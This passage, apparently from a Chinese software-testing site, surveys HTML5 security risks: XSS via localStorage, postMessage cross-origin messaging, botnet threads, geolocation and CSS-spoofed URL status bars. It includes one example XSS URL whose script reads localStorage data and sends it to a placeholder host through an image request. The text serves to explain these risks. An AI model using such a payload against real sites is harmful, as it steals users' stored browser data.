举例:
通过存在的xss漏洞,运用localStorage接口函数,获取用户在本地存储数据。
http://exmple.com/page.php?name=<script>doucument.write("<img src='http://foo.com?evil="+localStorage.getItem('info') +" '>");
(5)5M的存储空间,攻击者可以把蠕虫的shellcode代码存储在本地。参见《XSS virus探究》
四、HTML5 跨源请求
1、函数介绍
通过postMessage函数,向跨域的页面发送消息。可以实现对跨域页面内容进行修改。
接收postMessage消息的页面
<span style="font-size: small;"><!DOCTYPE HTML> </body> |
……………………
查看全文请点击下载:http://www.51testing.com/html/11/n-832511.html
3、安全风险:
(1)通过跳转到恶意网站。
(2)恶意网站中存在僵尸网络代码,启动后台新线程。
(3)从恶意网站或者是,第三方网站发送ajax,获取控制信息。实现僵尸网络。
七、地理位置信息
新的html5支持用户地理位置信息的获取。
八、CSS3增加了UI攻击风险
Mozilla Firefox、Google Chrome,Microsoft Internet Explorer是流行的WEB浏览器。在这几款浏览器中,是没有固定的URL状态栏的。只有当用户的鼠标放置到有链接的控件上时,浏览器的左下角才会出现URL状态栏。在这种情况下,攻击者可以使用CSS样式去伪造URL状态栏,对用户进行欺骗。当用户点击控件链接的时候,转向的地址并非是URL状态栏中看到的地址,而是转向到了一个用户未知的恶意地址。
查看全文请点击下载:http://www.51testing.com/html/11/n-832511.html
版权声明:51Testing软件测试网及相关内容提供者拥有51testing.com内容的全部版权,未经明确的书面许可,任何人或单位不得对本网站内容复制、转载或进行镜像,否则将追究法律责任。